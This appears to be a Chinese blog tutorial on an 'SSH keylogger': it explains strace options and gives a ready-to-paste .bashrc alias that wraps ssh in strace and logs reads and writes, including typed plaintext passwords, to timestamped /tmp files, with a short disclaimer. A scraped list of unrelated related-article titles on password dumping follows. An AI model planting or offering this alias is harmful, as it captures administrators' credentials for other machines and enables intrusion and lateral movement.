简介

SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码

主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。

Strace

strace命令是一个集诊断、调试、统计于一体的工具,常用来跟踪进程执行时的系统调用和所接收的信号,可以用它来监控用户空间进程和内核的交互。

参数:

-c 统计每一系统调用的所执行的时间,次数和出错的次数等.

-d 输出strace关于标准错误的调试信息.

-f 跟踪由fork调用所产生的子进程.

-i 输出系统调用的入口指针.

-q 禁止输出关于脱离的消息.

-r 打印出相对时间关于,,每一个系统调用.

-t 在输出中的每一行前加上时间信息.

-T 显示每一调用所耗的时间.

-e expr 指定一个表达式,用来控制如何跟踪.格式:[qualifier=][!]value1[,value2]

-e trace=process 只跟踪有关进程控制的系统调用.

-e trace=network 跟踪与网络有关的所有系统调用.

-e strace=signal 跟踪所有与系统信号有关的系统调用.

-e trace=ipc 跟踪所有与进程通讯有关的系统调用.

-e abbrev=set 设定strace输出的系统调用的结果集.-v 等于abbrev=none.默认为abbrev=all.

-e raw=set 将指定的系统调用的参数以十六进制显示.

-o filename 将strace的输出写入文件filename

-p pid 跟踪指定的进程pid.

-s strsize 指定输出的字符串的最大长度.默认为32.文件名一直全部输出.

-u username 以username的UID和GID执行被跟踪的命令

SSH Keylogger

首先确保Linux主机已经安装strace工具并且能够正常使用

编辑用户家目录文件夹中的一个隐藏文件 '.bashrc' 并添加如下代码

vi .bashrc

#添加

alias ssh='strace -o /tmp/ssh-`date "+%m-%d-%H-%M"`.log -e read,write -s200 ssh'

#%m  表示月

#%d   表示日

#%H  表示小时

%M    表示分钟

运行命令 'source .bashrc' 是配置生效

source .bashrc

source命令用于重新执行修改的初始化文件使之立即生效,而不必注销并重新登录

'.bashrc' 文件就相当于 shell 的配置文件

Linux 系统中有很多 shell,包括bash,sh,zsh,dash等,不管哪种 shell 都会有一个 .bashrc 的隐藏文件,主要保存个人的一些个性化设置,如命令别名、路径等

然后再尝试使用ssh命令登录到其他的用户

则会在将交互时的所有信息保存在 /tmp 目录下的一个文件中,可以自己指定生成的文件路径

cat /tmp/ssh-11-16-06-05.log

终端中输入密码时不可见,但是输入的密码键盘记录会保存在文件当中,终端中的所有显示同样会保存在文件当中。

但是好像只能在当前用户的终端进行ssh命令才会记录相关信息,不在用户的终端中进行正常的ssh连接则不会记录相关的信息。

声明

提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或间接损失由使用者自行承担。

结语

没有那么多天赋异禀,优秀的人总是努力地翻山越岭。

SSH Keylogger密码抓取相关推荐

  1. Windows系统密码抓取与防护

    Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eea ...

  2. 关于Windows系列密码抓取

    首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令.后来出现"LAN Manag ...

  3. 内网安全之:Windows 密码抓取

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

  4. windows密码抓取的多种方法

    0x01 准备阶段 1.下载pwdump7: 链接:https://pan.baidu.com/s/1zhSJTNnAl43BHblWU3nI5A 提取码:f74o 解压密码:321      (为啥 ...

  5. linux用户密码转换为明文,Linux strace 明文密码抓取

    strace常用来跟踪进程执行时的系统调用和所接收的信号,默认是没有安装,但是往往在提权后我们想得到root密码,我们可以使用这种方法来获取明文密码.安装很简单就一条命令 (Test On cento ...

  6. HackBrowserData密码抓取

    一.简介 hack-browser-data是一个开源工具,可以帮助您从浏览器解密数据(密码|书签| cookie |历史记录|信用卡|下载链接).它支持市场上最受欢迎的浏览器,并可以在Windows ...

  7. 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  8. linux下抓管理员hash,Linux下抓取登陆用户密码神器mimipenguin

    windows下有Mimikatz,现在linux下有了mimipenguin,国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,弥补了Linux ...

  9. [网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了Procmon软件基本用法及文件进程.注册表查看,这是一款微软推荐的系 ...

最新文章

  1. tcpdump 命令的个常用选项:三
  2. AC解 - Phone List(HDOJ#1671) 前缀树的一个应用
  3. Delphi的笔记整理(一)
  4. 如何查找SAP Fiori launchpad Designer的准确路径即url地址
  5. CAlayer层的属性
  6. css设置按钮竖直方向居中_如何借助伪元素实现垂直居中?
  7. 用python画桃花_python 画图
  8. thinkphp5 return 返回空_网红饮品大杯约1/3是空的!店员:这是公司设计的中空隔冷层...
  9. 测试 jdbc 中连接关闭的时机
  10. 使用 Python 构建电影推荐系统
  11. 使用AD域管理您的本地计算机密码
  12. 程序员经常浏览的网站
  13. Image.Save 方法
  14. web实现html页面思维导图效果
  15. 锐龙r9 5900hx和i7 11800h哪个好 i711800h和锐龙r95900hx对比
  16. [转]用天文方法计算日月合朔(新月)
  17. 非常感人的情感日志:这些话看哭了很多人
  18. 谈Java语言规范之枚举类型
  19. i5 1135g7和i5 1035g1参数对比区别大吗? 哪个好
  20. WiFi市场之我见(3)

热门文章

  1. mysql 排除字段_mysql中select某表时排除个别字段,shell实现
  2. 读取qq聊天记录文件(诺基亚塞班S60v3平台)
  3. java计算机毕业设计进出货管理系统(附源码、数据库)
  4. Spring实战读书笔记 高级装配(1)
  5. Python3 Wgs84\gcj02\bd09\mercator\bd09mc坐标系转换与投影
  6. JS中本地存储的方式有哪些?
  7. 一看就懂!renren-fast 快速开发框架使用以及开发文档
  8. c# 小票机打印二维条码_C# winform小票打印
  9. 经验正交函数 (EOF) / 主成分 (PCA) 分解及Python实现
  10. 滚动轴承故障诊断MATLAB程序:快速谱峭度、谱峭度+包络谱分析